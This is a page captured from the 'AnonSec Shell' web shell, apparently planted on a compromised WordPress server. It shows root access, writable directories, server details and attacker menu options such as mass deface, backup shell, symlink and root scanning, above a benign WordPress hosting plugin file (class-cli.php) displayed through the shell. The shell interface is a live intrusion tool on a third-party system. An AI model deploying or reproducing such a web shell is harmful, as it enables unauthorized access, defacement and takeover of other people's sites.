AnonSec Shell
Server IP : 104.21.14.48  /  Your IP : 18.227.49.243   [ Reverse IP ]
Web Server : Apache
System : Linux b70eb322-3aee-0c53-7c82-0db91281f2c6.secureserver.net 6.1.90-1.el9.elrepo.x86_64 #1 SMP PREEMPT_DYNAMIC Thu May 2 12:09:22 EDT 2024 x86_64
User : root ( 0)
PHP Version : 8.0.30.2
Disable Function : NONE
Domains : 0 Domains
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/wp-content/mu-plugins/gd-system-plugin/includes/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     [ BACKUP SHELL ]     [ JUMPING ]     [ MASS DEFACE ]     [ SCAN ROOT ]     [ SYMLINK ]     

Current File : /var/www/wp-content/mu-plugins/gd-system-plugin/includes/class-cli.php
<?php

namespace WPaaS;

use \WP_CLI;

if ( ! defined( 'ABSPATH' ) ) {

	exit;

}

final class CLI {

	/**
	 * Class constructor.
	 */
	public function __construct() {

		$commands = [
			'cache' => '\WPaaS\CLI\Cache',
		];

		foreach ( $commands as $command => $class ) {

			unset( $commands[ $command ] );

			$commands[ Plugin::cli_command( $command, [], false ) ] = $class;

			if ( 'wpaas' !== Plugin::cli_base_command() ) {

				$commands[ "wpaas {$command}" ] = $class;

			}

		}

		// Custom subcommand for a default command
		$commands['cron event wpaas'] = '\WPaaS\CLI\Cron_Event';

		/**
		 * Filter the default custom WP-CLI commands.
		 *
		 * @since 2.0.0
		 *
		 * @var array
		 */
		$commands = (array) apply_filters( 'wpaas_cli_commands', $commands );

		$this->register( $commands );

	}

	/**
	 * Register custom WP-CLI commands.
	 *
	 * @param  array $commands
	 *
	 * @return array|bool
	 */
	private function register( array $commands ) {

		if ( ! $commands || ! is_array( $commands ) ) {

			return false;

		}

		$registered = [];

		foreach ( $commands as $command => $class ) {

			if ( ! class_exists( $class ) ) {

				continue;

			}

			WP_CLI::add_command( $command, $class );

			$registered[ $command ] = $class;

		}

		return ( $registered ) ? $registered : false;

	}

}

Anon7 - 2022
AnonSec Team